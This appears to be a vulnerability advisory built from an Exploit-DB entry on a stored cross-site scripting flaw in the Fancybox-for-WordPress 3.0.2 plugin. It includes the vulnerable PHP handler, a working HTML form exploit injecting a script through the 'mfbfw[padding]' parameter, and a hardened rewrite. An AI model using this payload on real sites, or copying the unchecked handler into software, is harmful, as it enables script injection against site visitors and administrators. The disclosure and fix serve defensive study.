Vendor: Fancybox-for-WordPress
Author: NULLpOint7r
CVSS: 8.8 (HIGH)
Vulnerability Type: Stored XSS
CWE: 79
Product Name: Fancybox-for-WordPress
Affected Version From: 3.0.2
Affected Version To: 3.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:fancybox-for-wordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

WordPress plugin Fancybox-for-WordPress Stored XSS

A stored cross-site scripting (XSS) vulnerability exists in version 3.0.2 of the Fancybox-for-WordPress plugin for WordPress. The plugin's settings-update handler stores the submitted 'mfbfw[padding]' value without validating or encoding it, so an attacker can inject JavaScript that is executed in the browser of any victim who loads a page on which the stored value is output. The injection is performed by sending a specially crafted POST request to the vulnerable page with the malicious JavaScript in the 'mfbfw[padding]' parameter.

Mitigation:

Upgrade to the latest version of the Fancybox-for-WordPress plugin.

Exploit-DB raw data:

# Exploit Title: WordPress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/

vulnerable code [fancybox.php]:

if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {

    if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {

        // Nothing in this excerpt checks the caller's capabilities or a nonce,
        // so the branch runs for any request carrying these two parameters.
        $settings = stripslashes_deep( $_POST['mfbfw'] );
        // convert_chars() only normalises a few special characters; it does not
        // encode '<' or '>', so the submitted markup is stored unchanged.
        $settings = array_map( 'convert_chars', $settings );

        // The unsanitised array is persisted and later echoed by the plugin.
        update_option( 'mfbfw', $settings );
        wp_safe_redirect( add_query_arg('updated', 'true') );
    }
}

exploit: 

<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
    <input type="text" name="action" value="update">
    <input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
    <input type="submit" value="Send">
</form>
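For comparison, here is a hardened rewrite of the settings-update handler shown above. This is an added example, not the plugin's own code: the function names, the admin-post hook name, the nonce action and the assumption that 'padding' is a pixel count are mine; the option name 'mfbfw' and the 'padding' key come from the page.

```php
<?php
// Hardened version of the handler excerpted above (added example, not the
// plugin's code). Every mfbfw_example_* name and the nonce action are assumed.

// Each accepted key gets its own sanitizer; unknown keys are dropped entirely.
function mfbfw_example_sanitize_settings( array $raw ) {
    $clean = array();
    // Fancybox's padding is a pixel count (assumption), so only a
    // non-negative integer is ever stored, never free text.
    $clean['padding'] = isset( $raw['padding'] ) ? absint( $raw['padding'] ) : 10;
    // Any genuinely free-text setting is reduced to plain text.
    $clean['title'] = isset( $raw['title'] ) ? sanitize_text_field( $raw['title'] ) : '';
    return $clean;
}

function mfbfw_example_handle_update() {
    // 1. Authorization: only users who may manage options can save settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF: the form must carry a valid nonce (emitted in the settings form
    //    with wp_nonce_field( 'mfbfw_example_save', 'mfbfw_example_nonce' )).
    check_admin_referer( 'mfbfw_example_save', 'mfbfw_example_nonce' );

    // 3. Input validation: per-field sanitizers replace array_map('convert_chars').
    $raw = ( isset( $_POST['mfbfw'] ) && is_array( $_POST['mfbfw'] ) )
        ? wp_unslash( $_POST['mfbfw'] )
        : array();
    $settings = mfbfw_example_sanitize_settings( $raw );

    update_option( 'mfbfw', $settings );
    wp_safe_redirect( add_query_arg( 'updated', 'true', wp_get_referer() ) );
    exit;
}
add_action( 'admin_post_mfbfw_example_update', 'mfbfw_example_handle_update' );

// 4. Output encoding: the stored settings are written into an inline script
//    as JSON with '<' and '>' hex-escaped, so a stored "</script>" can never
//    close the tag even if a bad value slipped past validation.
function mfbfw_example_print_config() {
    $settings = get_option( 'mfbfw', array() );
    $json = wp_json_encode( $settings, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
    echo '<script>var mfbfwSettings = ' . $json . ';</script>';
}
add_action( 'wp_head', 'mfbfw_example_print_config' );
```

With these checks in place, the unauthenticated cross-site POST from the form above fails at the capability and nonce checks, and the 'padding' value is coerced to an integer before it is stored.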